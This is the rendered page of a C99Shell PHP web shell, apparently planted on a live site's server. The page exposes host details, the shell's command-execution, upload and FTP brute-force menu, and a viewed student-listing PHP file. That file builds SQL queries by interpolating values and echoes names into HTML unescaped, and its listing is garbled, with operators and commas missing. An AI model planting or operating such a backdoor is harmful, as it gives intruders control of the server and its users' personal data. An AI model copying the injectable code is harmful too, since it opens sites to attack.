!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/itce.co.in/   drwxr-xr-x
Free 30.76 GB of 49.93 GB (61.62%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     passout_students.php (2.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include 'admin/connect.php';

// Get all issued certificate enrollments
$query "SELECT enrollment FROM certificate ORDER BY id DESC";
$result mysqli_query($link$query);
?>
<section id="clients" class="clients section">
  <div data-aos="fade-up" data-aos-delay="100">
    <div class="clients-slider swiper init-swiper">
      <script type="application/json" class="swiper-config">
        {
          "loop": true,
          "speed": 6000,
          "autoplay": {
            "delay": 1,
            "disableOnInteraction": false
          },
          "centeredSlides": true,
          "slideToClickedSlide": true,
          "slidesPerView": "auto",
          "spaceBetween": 40,
          "breakpoints": {
            "320": {
              "slidesPerView": 2,
              "spaceBetween": 20
            },
            "640": {
              "slidesPerView": 3,
              "spaceBetween": 20
            },
            "992": {
              "slidesPerView": 4,
              "spaceBetween": 30
            },
            "1200": {
              "slidesPerView": 6,
              "spaceBetween": 40
            }
          }
        }
      </script>

      <div class="swiper-wrapper">
    <?php
    
if ($result && mysqli_num_rows($result) > 0) {
        while (
$row mysqli_fetch_assoc($result)) {
            
$enrollment $row['enrollment'];

            
// Get student details from admission
            
$q2 "SELECT enrollment, name, fatherName, photo 
                   FROM admission 
                   WHERE enrollment='
$enrollment' LIMIT 1";
            
$r2 mysqli_query($link$q2);
            if (
$r2 && mysqli_num_rows($r2) > 0) {
                
$student mysqli_fetch_assoc($r2);
                
$photo = !empty($student['photo']) 
                         ? 
'data/files/'.$student['photo'
                         : 
'assets/img/default-student.png';

              echo 
'<div class="swiper-slide">
        <div class="client-logo text-center">
            <img src="'
.$photo.'" class="img-fluid mb-2" alt="'.$student['name'].' ('.$student['enrollment'].')">
            <p class="fw-bold small mt-2">'
.$student['name'].'</p>
        </div>
      </div>'
;

            }
        }
    } else {
        echo 
'<div class="swiper-slide"><div class="client-logo text-center">
                <img src="assets/img/default-student.png" class="img-fluid mb-2" alt="No Data">
                <p class="fw-bold small">No Data</p>
              </div></div>'
;
    }
    
?>
</div>

</section>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0016 ]--